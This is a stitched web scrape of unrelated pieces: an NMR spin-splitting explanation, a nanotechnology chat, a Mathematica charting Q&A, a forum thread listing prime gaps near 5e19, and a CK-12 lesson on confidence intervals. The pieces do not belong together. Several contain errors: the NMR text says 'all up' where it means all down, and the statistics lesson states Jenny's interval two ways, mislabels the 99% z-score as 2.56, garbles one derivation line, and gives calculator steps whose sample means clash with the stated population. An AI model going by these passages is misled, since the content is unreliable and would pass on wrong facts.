These can be described by the spin numbers: (+1/2, +1/2), (+1/2, -1/2), (-1/2, +1/2), (-1/2, -1/2). It should be easy to see that the energies of the two combinations (+1/2, -1/2) and (-1/2, +1/2) will be equal. We can order these possibilities according to their expected energies in the presence of a strong external field:
The splitting of the protons on Carbon A will be into three signals in a 1:2:1 ratio, the 2 arising because that energy level is twice as probable.
The case for three protons on an adjacent carbon atom is worked out in a similar fashion. Again, the splitting seen by the protons on Carbon A attached to Carbon B (a methyl group) would be as follows:
There are 8 possible combinations of spin states which divide into a 1:3:3:1 ratio. Either all spins are up, two up and one down, two down and one up, or all up. A proton or protons on one carbon atom adjacent to a methyl group will, therefore, split into a quartet with area ratios of 1:3:3:1.
Ethyl
If we have a ${\text{CH}}_{3}{\text{CH}}_{2}^{-}$ group, as in chloroethane, we would expect to see two peaks in a ratio of 3:2. The methyl group signal will be split into a triplet (with relative areas of 1:2:1) by coupling to the methylene protons. The methylene protons are split into a quartet (with relative areas of 1:3:3:1) by coupling to the methyl protons. Therefore, we expect the spectrum of an ethyl group to look something like…
***SORRY, THIS MEDIA TYPE IS NOT SUPPORTED.***
Notice that the chemical shift of a peak split by coupling is defined as the center of the peak pattern. As mentioned earlier, the distance between the peaks of the ${\text{CH}}_{3}$ group (the coupling constant) will be the same as the distance between the peaks of the ${\text{CH}}_{2}$ group. Also note that the total intensity of the peaks due to the ${\text{CH}}_{3}$ group is 1.5 times the size of the total intensity for the peaks of the ${\text{CH}}_{2}$ group.
how to know photocatalytic properties of tio2 nanoparticles...what to do now
it is a goid question and i want to know the answer as well
Maciej
Do somebody tell me a best nano engineering book for beginners?
what is fullerene does it is used to make bukky balls
are you nano engineer ?
s.
what is the Synthesis, properties,and applications of carbon nano chemistry
Mostly, they use nano carbon for electronics and for materials to be strengthened.
Virgil
is Bucky paper clear?
CYNTHIA
so some one know about replacing silicon atom with phosphorous in semiconductors device?
Yeah, it is a pain to say the least. You basically have to heat the substarte up to around 1000 degrees celcius then pass phosphene gas over top of it, which is explosive and toxic by the way, under very low pressure.
Harper
Do you know which machine is used to that process?
s.
how to fabricate graphene ink ?
for screen printed electrodes ?
SUYASH
What is lattice structure?
of graphene you mean?
Ebrahim
or in general
Ebrahim
in general
s.
Graphene has a hexagonal structure
tahir
On having this app for quite a bit time, Haven't realised there's a chat room in it.
Cied
what is biological synthesis of nanoparticles
what's the easiest and fastest way to the synthesize AgNP?
China
Cied
types of nano material
I start with an easy one. carbon nanotubes woven into a long filament like a string
Porter
many many of nanotubes
Porter
what is the k.e before it land
Yasmin
what is the function of carbon nanotubes?
Cesar
I'm interested in nanotube
Uday
what is nanomaterials and their applications of sensors.
what is nano technology
what is system testing?
preparation of nanomaterial
Yes, Nanotechnology has a very fast field of applications and their is always something new to do with it...
what is system testing
what is the application of nanotechnology?
Stotaw
In this morden time nanotechnology used in many field . 1-Electronics-manufacturad IC ,RAM,MRAM,solar panel etc 2-Helth and Medical-Nanomedicine,Drug Dilivery for cancer treatment etc 3- Atomobile -MEMS, Coating on car etc. and may other field for details you can check at Google
Azam
anybody can imagine what will be happen after 100 years from now in nano tech world
Prasenjit
after 100 year this will be not nanotechnology maybe this technology name will be change . maybe aftet 100 year . we work on electron lable practically about its properties and behaviour by the different instruments
Azam
name doesn't matter , whatever it will be change... I'm taking about effect on circumstances of the microscopic world
Prasenjit
how hard could it be to apply nanotechnology against viral infections such HIV or Ebola?
Damian
silver nanoparticles could handle the job?
Damian
not now but maybe in future only AgNP maybe any other nanomaterials
Azam
Hello
Uday
I'm interested in Nanotube
Uday
this technology will not going on for the long time , so I'm thinking about femtotechnology 10^-15
Prasenjit
can nanotechnology change the direction of the face of the world
how did you get the value of 2000N.What calculations are needed to arrive at it
Privacy Information Security Software Version 1.1a
Good
Berger describes sociologists as concerned with
Got questions? Join the online conversation and get instant answers!
|
|
# Positioning ChartLabels in a horizontal stacked BarChart
I can create a BarChart with horizontal bars (using BarOrigin -> Left) and Mathematica will automatically position the ChartLabels on the left hand side:
data1D = RandomReal[{1, 10}, 10];
labels = DictionaryLookup["D*", 10];
BarChart[data1D, BarOrigin -> Left, ChartLabels -> labels,
BaseStyle -> {FontFamily -> "Calibri", 14}]
However, if I want to plot a stacked chart in the same way, the ChartLabels appear below the bars:
data2D = RandomReal[{1, 10}, {10, 2}];
BarChart[data2D, BarOrigin -> Left, ChartLayout -> "Stacked",
ChartLabels -> {labels, None},
BaseStyle -> {FontFamily -> "Calibri", 14}]
How can I get the labels for the stacked chart to appear as they do in the simple chart?
-
ChartLabels -> {Placed[labels, Axis], None}
thank you! I looked at Placed but didn't see Axis in the docs. Accepting immediately as this is 100% what I wanted. – Simon Woods Nov 23 '12 at 13:40
Simon, thank you for the accept. I have been struggling with option combinations BarOrigin/Joined in BarCharts/Histograms; somehow Joined->True works properly only if BarOrigin->Bottom (perhaps due to some corruption in my mma installation). Do you mind checking if Joined->True works as expected in your example? – kglr Nov 23 '12 at 15:56
I can confirm that Joined->True does not work properly on my example (MMA 8.04). – Simon Woods Nov 23 '12 at 19:26
|
|
mersenneforum.org Where to find Prime Gap lists?
Register FAQ Search Today's Posts Mark Forums Read
2019-12-21, 10:02 #23
robert44444uk
Jun 2003
Oxford, UK
2·7·137 Posts
Quote:
Originally Posted by storm5510 I did the code test earlier. I stripped the code down to what was necessary, compiled it and ran the test. It did far better than I was expecting. Check out the screen capture. The floating-point numbers and the ends are start time and end time. Take away some digits at both ends and use what is near the decimal point. 25.44 seconds.
So danaj's suite of prime functions in perl Math::Prime::Util is 25 times faster - time to change to perl !!
If its any help I am not computer literate and did not start on perl before my 65th birthday
2019-12-21, 10:03 #24
robert44444uk
Jun 2003
Oxford, UK
35768 Posts
Quote:
Originally Posted by sweety439 Well....
Well?
2019-12-21, 12:22 #25
storm5510
Random Account
Aug 2009
U.S.A.
22×11×41 Posts
Quote:
Originally Posted by robert44444uk So danaj's suite of prime functions in perl Math::Prime::Util is 25 times faster - time to change to perl !! If its any help I am not computer literate and did not start on perl before my 65th birthday
Perl. Serously, I doubt I could learn enough of it to use it. Then again, perhaps I could. I found their site on the web. It has, what they call, ActiveStatePerl. Another is Strawberry. I am not sure which to look at.
Computer literate: After 32 years of it, I like to think I am. I have seen the evolution to where it is now. I never buy a new machine from a shelf. I build my own. None have ever gave me any problems.
2019-12-22, 11:12 #26 robert44444uk Jun 2003 Oxford, UK 2×7×137 Posts I use Strawberry Perl, which is the perl environment for Windows.
2019-12-22, 13:56 #27
storm5510
Random Account
Aug 2009
U.S.A.
22·11·41 Posts
Quote:
Originally Posted by robert44444uk I use Strawberry Perl, which is the perl environment for Windows.
Thanks. I will give it a look.
Quote:
Originally Posted by robert44444uk ...My best guess is that the smaller of the two primes that make up the first instance gap of length exactly 1,432 is less than 100,000,000,000,000,000,000.
I have been running some of these with what I wrote. I started at 5e19. All the gaps I am seeing are < 400.
2019-12-22, 15:39 #28
robert44444uk
Jun 2003
Oxford, UK
2·7·137 Posts
Quote:
Originally Posted by storm5510 Thanks. I will give it a look. I have been running some of these with what I wrote. I started at 5e19. All the gaps I am seeing are < 400.
The first few gaps >400, 1st column is the nth gap after 5e19. Time elapsed for the first million gaps was 100 secs. There were no gaps >=600.The first gap at the 600 level is that following 50000000000211284873
Code:
8645 50000000000000387671 50000000000000388119 448
34553 50000000000001565667 50000000000001566087 420
49325 50000000000002234033 50000000000002234463 430
62247 50000000000002821217 50000000000002821617 400
77934 50000000000003533853 50000000000003534279 426
78922 50000000000003579203 50000000000003579723 520
89175 50000000000004045967 50000000000004046373 406
103428 50000000000004694897 50000000000004695321 424
107476 50000000000004883687 50000000000004884101 414
108772 50000000000004941917 50000000000004942409 492
113676 50000000000005167523 50000000000005167941 418
132173 50000000000006006213 50000000000006006681 468
154035 50000000000006985029 50000000000006985449 420
164841 50000000000007476039 50000000000007476449 410
174248 50000000000007904219 50000000000007904621 402
177893 50000000000008066247 50000000000008066661 414
182013 50000000000008251143 50000000000008251547 404
235214 50000000000010665303 50000000000010665707 404
242998 50000000000011017149 50000000000011017557 408
250508 50000000000011356541 50000000000011356949 408
304099 50000000000013792623 50000000000013793043 420
354501 50000000000016067159 50000000000016067579 420
365911 50000000000016590869 50000000000016591277 408
369508 50000000000016751999 50000000000016752431 432
389618 50000000000017667927 50000000000017668379 452
390675 50000000000017715717 50000000000017716137 420
392445 50000000000017794781 50000000000017795187 406
392640 50000000000017803641 50000000000017804069 428
395579 50000000000017938281 50000000000017938691 410
398647 50000000000018081141 50000000000018081561 420
410892 50000000000018637337 50000000000018637749 412
421815 50000000000019136829 50000000000019137261 432
424822 50000000000019274423 50000000000019274831 408
433663 50000000000019672697 50000000000019673181 484
458278 50000000000020787267 50000000000020787671 404
458609 50000000000020801897 50000000000020802317 420
478131 50000000000021687383 50000000000021687797 414
491265 50000000000022280321 50000000000022280787 466
496565 50000000000022518561 50000000000022519037 476
501250 50000000000022735853 50000000000022736253 400
508640 50000000000023075153 50000000000023075669 516
516120 50000000000023416289 50000000000023416691 402
519705 50000000000023580951 50000000000023581367 416
536596 50000000000024340619 50000000000024341129 510
537467 50000000000024378443 50000000000024378879 436
539029 50000000000024448317 50000000000024448779 462
589370 50000000000026733123 50000000000026733563 440
598449 50000000000027141153 50000000000027141591 438
624806 50000000000028331049 50000000000028331537 488
629368 50000000000028537841 50000000000028538267 426
632284 50000000000028673289 50000000000028673747 458
649090 50000000000029444103 50000000000029444507 404
665095 50000000000030174551 50000000000030174989 438
668424 50000000000030328401 50000000000030328803 402
681485 50000000000030913853 50000000000030914259 406
690803 50000000000031334291 50000000000031334699 408
703878 50000000000031928487 50000000000031928901 414
722278 50000000000032770277 50000000000032770689 412
733638 50000000000033284319 50000000000033284727 408
737072 50000000000033442241 50000000000033442731 490
743547 50000000000033735867 50000000000033736283 416
765778 50000000000034739901 50000000000034740479 578
766917 50000000000034791089 50000000000034791491 402
773953 50000000000035112827 50000000000035113253 426
774016 50000000000035116127 50000000000035116553 426
831195 50000000000037712319 50000000000037712733 414
837834 50000000000038012807 50000000000038013357 550
852115 50000000000038651469 50000000000038651891 422
888621 50000000000040311239 50000000000040311681 442
890510 50000000000040396841 50000000000040397261 420
903100 50000000000040962369 50000000000040962813 444
908429 50000000000041205581 50000000000041206013 432
912511 50000000000041391719 50000000000041392151 432
913646 50000000000041441577 50000000000041442051 474
956618 50000000000043377591 50000000000043378041 450
961002 50000000000043576733 50000000000043577163 430
961491 50000000000043598577 50000000000043598993 416
962494 50000000000043643427 50000000000043643871 444
999780 50000000000045334157 50000000000045334557 400
------
4657132 50000000000211284873 50000000000211285473 600
------
5621202 50000000000255031019 50000000000255031653 634
------
5946444 50000000000269759343 50000000000269760033 690
Last fiddled with by robert44444uk on 2019-12-22 at 15:53
2019-12-22, 15:56 #29
storm5510
Random Account
Aug 2009
U.S.A.
180410 Posts
Quote:
Originally Posted by robert44444uk ...The first few gaps >400, 1st column is the nth gap after 5e19. There were no gaps >=600
I compared what you have here with what I have. I was able to match the first six of yours. I will never be able to run as fast as yours. At least, it is accurate.
I download and installed Strawberry and looked at some of the examples. I wish it had a really good front-end for code writing.
2019-12-23, 09:01 #30
robert44444uk
Jun 2003
Oxford, UK
2·7·137 Posts
Quote:
Originally Posted by storm5510 I compared what you have here with what I have. I was able to match the first six of yours. I will never be able to run as fast as yours. At least, it is accurate. I download and installed Strawberry and looked at some of the examples. I wish it had a really good front-end for code writing.
The first thing to do is to learn how to download additional modules via the command prompt using the CPAN command. Typical modules that I use are:
Timer::Runtime
Math::GMPz
Math::BigFloat
Math::Prime::Util
File::Slurp
With these you can really motor with prime finding and gaps
I learnt some of the basics through https://perlmaven.com/. There are other sites such as https://www.learn-perl.org . Specific enquiries on "how to" can be found through Google searches or through https://www.perlmonks.org/, but with the last of these, if you ask a question, they get pretty angry if it is something you could have found through a search or by "learning by doing".
You can always adapt code you find in the Prime Search Group posts, which is what I do!
2019-12-24, 14:39 #31
storm5510
Random Account
Aug 2009
U.S.A.
22·11·41 Posts
Quote:
Originally Posted by robert44444uk The first few gaps >400, 1st column is the nth gap after 5e19. Time elapsed for the first million gaps was 100 secs. There were no gaps >=600.The first gap at the 600 level is that following 50000000000211284873 Code: 8645 50000000000000387671 50000000000000388119 448 34553 50000000000001565667 50000000000001566087 420 49325 50000000000002234033 50000000000002234463 430 62247 50000000000002821217 50000000000002821617 400 77934 50000000000003533853 50000000000003534279 426 78922 50000000000003579203 50000000000003579723 520 89175 50000000000004045967 50000000000004046373 406 103428 50000000000004694897 50000000000004695321 424 107476 50000000000004883687 50000000000004884101 414 108772 50000000000004941917 50000000000004942409 492 113676 50000000000005167523 50000000000005167941 418 132173 50000000000006006213 50000000000006006681 468 154035 50000000000006985029 50000000000006985449 420 164841 50000000000007476039 50000000000007476449 410 174248 50000000000007904219 50000000000007904621 402 177893 50000000000008066247 50000000000008066661 414 182013 50000000000008251143 50000000000008251547 404 235214 50000000000010665303 50000000000010665707 404 242998 50000000000011017149 50000000000011017557 408 250508 50000000000011356541 50000000000011356949 408 304099 50000000000013792623 50000000000013793043 420 354501 50000000000016067159 50000000000016067579 420 365911 50000000000016590869 50000000000016591277 408 369508 50000000000016751999 50000000000016752431 432 389618 50000000000017667927 50000000000017668379 452 390675 50000000000017715717 50000000000017716137 420 392445 50000000000017794781 50000000000017795187 406 392640 50000000000017803641 50000000000017804069 428 395579 50000000000017938281 50000000000017938691 410 398647 50000000000018081141 50000000000018081561 420 410892 50000000000018637337 50000000000018637749 412 421815 50000000000019136829 50000000000019137261 432 424822 50000000000019274423 50000000000019274831 408 433663 50000000000019672697 50000000000019673181 484 458278 50000000000020787267 50000000000020787671 404 458609 50000000000020801897 50000000000020802317 420 478131 50000000000021687383 50000000000021687797 414 491265 50000000000022280321 50000000000022280787 466 496565 50000000000022518561 50000000000022519037 476 501250 50000000000022735853 50000000000022736253 400 508640 50000000000023075153 50000000000023075669 516 516120 50000000000023416289 50000000000023416691 402 519705 50000000000023580951 50000000000023581367 416 536596 50000000000024340619 50000000000024341129 510 537467 50000000000024378443 50000000000024378879 436 539029 50000000000024448317 50000000000024448779 462 589370 50000000000026733123 50000000000026733563 440 598449 50000000000027141153 50000000000027141591 438 624806 50000000000028331049 50000000000028331537 488 629368 50000000000028537841 50000000000028538267 426 632284 50000000000028673289 50000000000028673747 458 649090 50000000000029444103 50000000000029444507 404 665095 50000000000030174551 50000000000030174989 438 668424 50000000000030328401 50000000000030328803 402 681485 50000000000030913853 50000000000030914259 406 690803 50000000000031334291 50000000000031334699 408 703878 50000000000031928487 50000000000031928901 414 722278 50000000000032770277 50000000000032770689 412 733638 50000000000033284319 50000000000033284727 408 737072 50000000000033442241 50000000000033442731 490 743547 50000000000033735867 50000000000033736283 416 765778 50000000000034739901 50000000000034740479 578 766917 50000000000034791089 50000000000034791491 402 773953 50000000000035112827 50000000000035113253 426 774016 50000000000035116127 50000000000035116553 426 831195 50000000000037712319 50000000000037712733 414 837834 50000000000038012807 50000000000038013357 550 852115 50000000000038651469 50000000000038651891 422 888621 50000000000040311239 50000000000040311681 442 890510 50000000000040396841 50000000000040397261 420 903100 50000000000040962369 50000000000040962813 444 908429 50000000000041205581 50000000000041206013 432 912511 50000000000041391719 50000000000041392151 432 913646 50000000000041441577 50000000000041442051 474 956618 50000000000043377591 50000000000043378041 450 961002 50000000000043576733 50000000000043577163 430 961491 50000000000043598577 50000000000043598993 416 962494 50000000000043643427 50000000000043643871 444 999780 50000000000045334157 50000000000045334557 400 ------ 4657132 50000000000211284873 50000000000211285473 600 ------ 5621202 50000000000255031019 50000000000255031653 634 ------ 5946444 50000000000269759343 50000000000269760033 690
It looks like you started at 5e19. I never went that high. I suspect that if you were to put long-haul file I/O and configuration saving in your code, you would not get this sort of speed. One is always at the mercy of the OS. I wrote mine to save everything it finds.
I gave it a try. I was again able to match the first dozen of your results. Yours sort of threw me. You have your larger digit on the right where mine is on the left.
Code:
50000000000000388119, 50000000000000387671, 448
50000000000001566087, 50000000000001565667, 420
50000000000002234463, 50000000000002234033, 430
50000000000002821617, 50000000000002821217, 400
50000000000003534279, 50000000000003533853, 426
50000000000003579723, 50000000000003579203, 520
50000000000004046373, 50000000000004045967, 406
50000000000004695321, 50000000000004694897, 424
50000000000004884101, 50000000000004883687, 414
50000000000004942409, 50000000000004941917, 492
50000000000005167941, 50000000000005167523, 418
50000000000006006681, 50000000000006006213, 468
Regarding Perl. This will be a work-in-progress for quite some time to come.
Last fiddled with by storm5510 on 2019-12-24 at 14:40
2019-12-24, 17:08 #32 storm5510 Random Account Aug 2009 U.S.A. 22·11·41 Posts An addendum. I really jacked the numbers up. I think the correct expression would be 1e46. It is a "1" with 46 zero's behind it. Gaps over 1,000 are scarce even at this level. The largest I have seen in the data file is 1,292. The really vast majority are from 500 to 800.
2019-12-24, 23:04 #33
storm5510
Random Account
Aug 2009
U.S.A.
22·11·41 Posts
Quote:
Originally Posted by robert44444uk ...The smallest gap where we do not know the first instance is 1,432. The smallest prime we know that this gap exists is 84,218,359,021,503,505,748,941 but there are likely to be many smaller instances with this gap size. My best guess is that the smaller of the two primes that make up the first instance gap of length exactly 1,432 is less than 100,000,000,000,000,000,000...
I have found "an" instance of 1,432. I had to start at 1e51 to do it. Are there instances of this gap in lower primes? I would say yes. Finding it could be time consuming...
Code:
1000000000000000000000000000000000000000000001871691
1000000000000000000000000000000000000000000001873123
1432
At 1e49, I started seeing some gaps over 1,000, but not many. I simply kept adding zero's.
Similar Threads Thread Thread Starter Forum Replies Last Post paulunderwood NeRDs 0 2014-02-03 05:09 R.D. Silverman Cunningham Tables 1 2010-09-21 16:16 MooooMoo Twin Prime Search 2 2006-05-11 23:38 xilman Forum Feedback 1 2006-04-23 18:14 ATH Lounge 20 2006-03-27 18:36
All times are UTC. The time now is 14:30.
Mon Jan 25 14:30:39 UTC 2021 up 53 days, 10:41, 0 users, load averages: 3.00, 2.53, 2.33
|
|
<img src="https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=iA1Pi1a8Dy00ym" style="display:none" height="1" width="1" alt="" />
# 7.3: Confidence Intervals
Difficulty Level: At Grade Created by: CK-12
## Learning Objectives
• Calculate the mean of a sample as a point estimate of the population mean.
• Construct a confidence interval for a population mean based on a sample mean.
• Calculate a sample proportion as a point estimate of the population proportion.
• Construct a confidence interval for a population proportion based on a sample proportion.
• Calculate the margin of error for a point estimate as a function of sample mean or proportion and size.
• Understand the logic of confidence intervals, as well as the meaning of confidence level and confidence intervals.
## Introduction
The objective of inferential statistics is to use sample data to increase knowledge about the entire population. In this lesson, we will examine how to use samples to make estimates about the populations from which they came. We will also see how to determine how wide these estimates should be and how confident we should be about them.
### Confidence Intervals
Sampling distributions are the connecting link between the collection of data by unbiased random sampling and the process of drawing conclusions from the collected data. Results obtained from a survey can be reported as a point estimate. For example, a single sample mean is a point estimate, because this single number is used as a plausible value of the population mean. Keep in mind that some error is associated with this estimate\begin{align*}-\end{align*}the true population mean may be larger or smaller than the sample mean. An alternative to reporting a point estimate is identifying a range of possible values the parameter might take, controlling the probability that the parameter is not lower than the lowest value in this range and not higher than the largest value. This range of possible values is known as a confidence interval. Associated with each confidence interval is a confidence level. This level indicates the level of assurance you have that the resulting confidence interval encloses the unknown population mean.
In a normal distribution, we know that 95% of the data will fall within two standard deviations of the mean. Another way of stating this is to say that we are confident that in 95% of samples taken, the sample statistics are within plus or minus two standard errors of the population parameter. As the confidence interval for a given statistic increases in length, the confidence level increases.
The selection of a confidence level for an interval determines the probability that the confidence interval produced will contain the true parameter value. Common choices for the confidence level are 90%, 95%, and 99%. These levels correspond to percentages of the area under the normal density curve. For example, a 95% confidence interval covers 95% of the normal curve, so the probability of observing a value outside of this area is less than 5%. Because the normal curve is symmetric, half of the 5% is in the left tail of the curve, and the other half is in the right tail of the curve. This means that 2.5% is in each tail.
The graph shown above was made using a TI-83 graphing calculator and shows a normal distribution curve for a set of data for which μ=50\begin{align*}\mu=50\end{align*} and σ=12\begin{align*}\sigma=12\end{align*}. A 95% confidence interval for the standard normal distribution, then, is the interval (1.96\begin{align*}-1.96\end{align*}, 1.96), since 95% of the area under the curve falls within this interval. The ±1.96\begin{align*}\pm 1.96\end{align*} are the z\begin{align*}z\end{align*}-scores that enclose the given area under the curve. For a normal distribution, the margin of error is the amount that is added to and subtracted from the mean to construct the confidence interval. For a 95% confidence interval, the margin of error is 1.96σ\begin{align*}1.96\sigma\end{align*}. (Note that previously we said that 95% of the data in a normal distribution falls within ±2\begin{align*}\pm 2\end{align*} standard deviations of the mean. This was just an estimate, and for the remainder of this textbook, we'll assume that 95% of the data actually falls within ±1.96\begin{align*}\pm 1.96\end{align*} standard deviations of the mean.)
The following is the derivation of the confidence interval for the population mean, μ\begin{align*}\mu\end{align*}. In it, zα2\begin{align*}z_{\frac{\alpha}{2}}\end{align*} refers to the positive z\begin{align*}z\end{align*}-score for a particular confidence interval. The Central Limit Theorem tells us that the distribution of x¯\begin{align*}\bar{x}\end{align*} is normal, with a mean of μ\begin{align*}\mu\end{align*} and a standard deviation of σn\begin{align*}\frac{\sigma}{\sqrt{n}}\end{align*}. Consider the following:
zα2<x¯μσn<zα2\begin{align*}-z_{\frac{\alpha}{2}} < \frac{\bar{x}-\mu}{\frac{\sigma}{\sqrt{n}}} < z_{\frac{\alpha}{2}}\end{align*}
All values are known except for μ\begin{align*}\mu\end{align*}. Solving for this parameter, we have:
x¯zα2σn<μ<zα2σnx¯x¯+zα2σn>μ>zα2σn+x¯x¯+zα2σn>μ>x¯zα2σnx¯zα2σn<μ<x¯+zα2σn\begin{align*}&-\bar{x} - z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}} < -\mu \mu > -z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}}+\bar{x}\\ &\bar{x} + z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}} > \mu > \bar{x} - z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}}\\ &\bar{x} - z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}} < \mu < \bar{x} + z_{\frac{\alpha}{2}}\frac{\sigma}{\sqrt{n}}\end{align*}
Another way to express this is: x¯±zα2(σn)\begin{align*}\bar{x} \pm z_{\frac{\alpha}{2}}\left ( \frac{\sigma}{\sqrt{n}} \right )\end{align*}.
On the Web
http://tinyurl.com/27syj3x This simulates confidence intervals for the mean of the population.
Example: Jenny randomly selected 60 muffins of a particular brand and had those muffins analyzed for the number of grams of fat that they each contained. Rather than reporting the sample mean (point estimate), she reported the confidence interval. Jenny reported that the number of grams of fat in each muffin is between 10.3 grams and 11.2 grams with 95% confidence.
In this example, the population mean is unknown. This number is fixed, not variable, and the sample means are variable, because the samples are random. If this is the case, does the confidence interval enclose this unknown true mean? Random samples lead to the formation of confidence intervals, some of which contain the fixed population mean and some of which do not. The most common mistake made by persons interpreting a confidence interval is claiming that once the interval has been constructed, there is a 95% probability that the population mean is found within the confidence interval. Even though the population mean is unknown, once the confidence interval is constructed, either the mean is within the confidence interval, or it is not. Hence, any probability statement about this particular confidence interval is inappropriate. In the above example, the confidence interval is from 10.3 to 12.1, and Jenny is using a 95% confidence level. The appropriate statement should refer to the method used to produce the confidence interval. Jenny should have stated that the method that produced the interval from 10.3 to 12.1 has a 0.95 probability of enclosing the population mean. This means if she did this procedure 100 times, 95 of the intervals produced would contain the population mean. The probability is attributed to the method, not to any particular confidence interval. The following diagram demonstrates how the confidence interval provides a range of plausible values for the population mean and that this interval may or may not capture the true population mean. If you formed 100 intervals in this manner, 95 of them would contain the population mean.
Example: The following questions are to be answered with reference to the above diagram.
a) Were all four sample means within 1.96σn\begin{align*}1.96 \frac{\sigma}{\sqrt{n}}\end{align*}, or 1.96σx¯\begin{align*}1.96\sigma_{\bar{x}}\end{align*}, of the population mean? Explain.
b) Did all four confidence intervals capture the population mean? Explain.
c) In general, what percentage of \begin{align*}\bar{x}'s\end{align*} should be within \begin{align*}1.96 \frac{\sigma}{\sqrt{n}}\end{align*} of the population mean?
d) In general, what percentage of the confidence intervals should contain the population mean?
a) The sample mean, \begin{align*}\bar{x}\end{align*}, for Sample 3 was not within \begin{align*}1.96\frac{\sigma}{\sqrt{n}}\end{align*} of the population mean. It did not fall within the vertical lines to the left and right of the population mean.
b) The confidence interval for Sample 3 did not enclose the population mean. This interval was just to the left of the population mean, which is denoted with the vertical line found in the middle of the sampling distribution of the sample means.
c) 95%
d) 95%
When the sample size is large \begin{align*}(n>30)\end{align*}, the confidence interval for the population mean is calculated as shown below:
\begin{align*}\bar{x}\pm z_{\frac{\alpha}{2}} \left ( \frac{\sigma}{\sqrt{n}} \right )\end{align*}, where \begin{align*}z_{\frac{\alpha}{2}}\end{align*} is 1.96 for a 95% confidence interval, 1.645 for a 90% confidence interval, and 2.56 for a 99% confidence interval.
Example: Julianne collects four samples of size 60 from a known population with a population standard deviation of 19 and a population mean of 110. Using the four samples, she calculates the four sample means to be:
\begin{align*}107 \qquad 112 \qquad 109 \qquad 115\end{align*}
a) For each sample, determine the 90% confidence interval.
b) Do all four confidence intervals enclose the population mean? Explain.
a) \begin{align*}&\bar{x} \pm z\frac{\sigma}{\sqrt{n}} && \bar{x} \pm z\frac{\sigma}{\sqrt{n}} && \bar{x} \pm z\frac{\sigma}{\sqrt{n}}\\ &107 \pm (1.645)(\frac{19}{\sqrt{60}}) && 112 \pm (1.645)(\frac{19}{\sqrt{60}}) && 109 \pm (1.645)(\frac{19}{\sqrt{60}})\\ &107 \pm 4.04 && 112 \pm 4.04 && 109 \pm 4.04\\ &\text{from} \ 102.96 \ \text{to} \ 111.04 && \text{from} \ 107.96 \ \text{to} \ 116.04 && \text{from} \ 104.96 \ \text{to} \ 113.04\end{align*}
\begin{align*}&\bar{x} \pm z\frac{\sigma}{\sqrt{n}}\\ &115 \pm (1.645)(\frac{19}{\sqrt{60}})\\ &115 \pm 4.04\\ &\text{from} \ 110.96 \ \text{to} \ 119.04\end{align*}
b) Three of the confidence intervals enclose the population mean. The interval from 110.96 to 119.04 does not enclose the population mean.
Technology Note: Simulation of Random Samples and Formation of Confidence Intervals on the TI-83/84 Calculator
Now it is time to use a graphing calculator to simulate the collection of three samples of sizes 30, 60, and 90, respectively. The three sample means will be calculated, as well as the three 95% confidence intervals. The samples will be collected from a population that displays a normal distribution, with a population standard deviation of 108 and a population mean of 2130. First, store the three samples in L1, L2, and L3, respectively, as shown below:
Store 'randInt\begin{align*}(\mu,\sigma,n)\end{align*}' in L1. The sample size is \begin{align*}n=30\end{align*}.
Store 'randInt\begin{align*}(\mu,\sigma,n)\end{align*}' in L2. The sample size is \begin{align*}n=60\end{align*}.
Store 'randInt\begin{align*}(\mu,\sigma,n)\end{align*}' in L3. The sample size is \begin{align*}n=90\end{align*}.
The lists of numbers can be viewed by pressing [STAT][ENTER]. The next step is to calculate the mean of each of these samples.
To do this, first press [2ND][LIST] and go to the MATH menu. Next, select the 'mean(' command and press [2ND][L1][ENTER]. Repeat this process for L2 and L3.
Note that your confidence intervals will be different than the ones calculated below, because the random numbers generated by your calculator will be different, and thus, your means will be different. For us, the means of L1, L2, and L3 were 1309.6, 1171.1, and 1077.1, respectively, so the confidence intervals are as follows:
\begin{align*}& \bar{x} \pm z\frac{\sigma}{\sqrt{n}} && \bar{x} \pm z\frac{\sigma}{\sqrt{n}} && \bar{x} \pm z\frac{\sigma}{\sqrt{n}}\\ & 1309.6 \pm (1.96)(\frac{108}{\sqrt{30}}) && 1171.1 \pm (1.96)(\frac{108}{\sqrt{60}}) && 1077.1 \pm (1.96)(\frac{108}{\sqrt{90}})\\ & 1309.6 \pm 38.65 && 1171.1 \pm 27.33 && 1077.1 \pm 22.31\\ & \text{from} \ 1270.95 \ \text{to} \ 1348.25 && \text{from} \ 1143.77 \ \text{to} \ 1198.43 && \text{from} \ 1054.79 \ \text{to} \ 1099.41\end{align*}
As was expected, the value of \begin{align*}\bar{x}\end{align*} varied from one sample to the next. The other fact that was evident was that as the sample size increased, the length of the confidence interval became smaller, or decreased. This is because with the increase in sample size, you have more information, and thus, your estimate is more accurate, which leads to a narrower confidence interval.
In all of the examples shown above, you calculated the confidence intervals for the population mean using the formula \begin{align*}\bar{x} \pm z_{\frac{\alpha}{2}} \left ( \frac{\sigma}{\sqrt{n}} \right )\end{align*}. However, to use this formula, the population standard deviation \begin{align*}\sigma\end{align*} had to be known. If this value is unknown, and if the sample size is large \begin{align*}(n>30)\end{align*}, the population standard deviation can be replaced with the sample standard deviation. Thus, the formula \begin{align*}\bar{x} \pm z_{\frac{\alpha}{2}} \left ( \frac{s_x}{\sqrt{n}} \right )\end{align*} can be used as an interval estimator, or confidence interval. This formula is valid only for simple random samples. Since \begin{align*}z_{\frac{\alpha}{2}} \left ( \frac{s_x}{\sqrt{n}} \right )\end{align*} is the margin of error, a confidence interval can be thought of simply as: \begin{align*}\bar{x} \pm\end{align*} the margin of error.
Example: A committee set up to field-test questions from a provincial exam randomly selected grade 12 students to answer the test questions. The answers were graded, and the sample mean and sample standard deviation were calculated. Based on the results, the committee predicted that on the same exam, 9 times out of 10, grade 12 students would have an average score of within 3% of 65%.
a) Are you dealing with a 90%, 95%, or 99% confidence level?
b) What is the margin of error?
c) Calculate the confidence interval.
d) Explain the meaning of the confidence interval.
a) You are dealing with a 90% confidence level. This is indicated by 9 times out of 10.
b) The margin of error is 3%.
c) The confidence interval is \begin{align*}\bar{x} \pm\end{align*} the margin of error, or 62% to 68%.
d) There is a 0.90 probability that the method used to produce this interval from 62% to 68% results in a confidence interval that encloses the population mean (the true score for this provincial exam).
### Confidence Intervals for Hypotheses about Population Proportions
